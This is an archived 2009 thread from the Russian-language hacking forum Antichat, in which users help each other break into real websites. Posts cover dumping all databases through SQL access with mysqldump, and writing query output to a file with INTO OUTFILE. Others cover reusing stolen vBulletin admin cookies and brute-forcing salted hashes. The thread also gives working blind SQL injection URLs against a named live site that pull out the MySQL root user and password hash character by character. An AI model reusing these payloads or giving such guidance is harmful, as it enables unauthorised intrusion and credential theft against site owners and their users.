ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.02.2009, 14:22
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Скажу сразу, там кароче любые команды идут sql, не знаю логина и пароль админа, но пробовал select from.. всё идёт! Что подскажете?
|
|
|
15.02.2009, 11:19
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
делал бэкап дб таким способом:
mysqldump -utracker -ptester. --all-databases > /www/tracker/stats/fuckme.sql
Выбило:
Shell command: mysqldump -utracker -paaa67&1!a. --all-databases > /www/tracker/stats/fuckme.sql
Usage: mysqldump [OPTIONS] database [tables]
OR mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...]
OR mysqldump [OPTIONS] --all-databases [OPTIONS]
For more options, use mysqldump --help
Что не так ?  |
|
|
|
15.02.2009, 11:21
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Смотря что за субд. В мускуле делается так:
select * from jops where name='12' into outfile '/www/files/dump.txt'
или into dumpfile
|
|
|
|
15.02.2009, 11:23
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
-utracker -ptester. -А чего это такое?
mysqldump --all-databases > all_databases.sql - Так мне кажется проще...
|
|
|
|
15.02.2009, 11:41
|
|
Новичок
Регистрация: 27.06.2008
Сообщений: 24
Провел на форуме:
60495
Репутация:
3
|
|
Здравствуйте уважаемые пользователи antichat.
У меня к вам вопрос. Точнее ситуация, надеюсь, вы поможете мне ее разрешить, т. к ранее я с cookies не сталкивался.
Вообщем есть сайт назовем его “x”. На его форуме движок, которого vBulletin v3.5.4.
Я имею логин администратора и его пароль в зашифровки (извлек из базы).
Так вот как мне подставить cookies? Я понимаю, что это делать надо, наверное, через Opera, но, сколько не пытался, не получалось. Помогите, пожалуйста.
Заранее огромное спасибо!
|
|
|
|
15.02.2009, 11:53
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
поставь себе денвер, поставь туда булку. и снифай через привокси или аналогичную программу запросы. потом аналогично проделай на нужном тебе сайте.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
15.02.2009, 12:37
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
лучше извлеки из БД ещё и соль и пробрути хеш. По кукам просто в админку не войдёшь - там повторная авторизация
|
|
|
|
15.02.2009, 15:51
|
|
Новичок
Регистрация: 21.01.2009
Сообщений: 9
Провел на форуме:
82271
Репутация:
1
|
|
ку всем
моя первая инъекция:
Код:
http://www.mega-porno.ru/signup.php/data:text/index.php?category=1'
не могу подобрать поля, может кто подскажет че да как?!?!?! |
|
|
|
15.02.2009, 18:14
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+(select+1)=1+and+(banne rs.cat_link.cat_id='1
Чтоб интересней было
|
|
|
|
15.02.2009, 20:56
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
MyTHblu,
http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select +user+from+mysql.user+limit+0,1),4,1))=116+--+
user - root
http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select +password+from+mysql.user+limit+0,1),4,1))>=10+--+
а хеш сам )
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
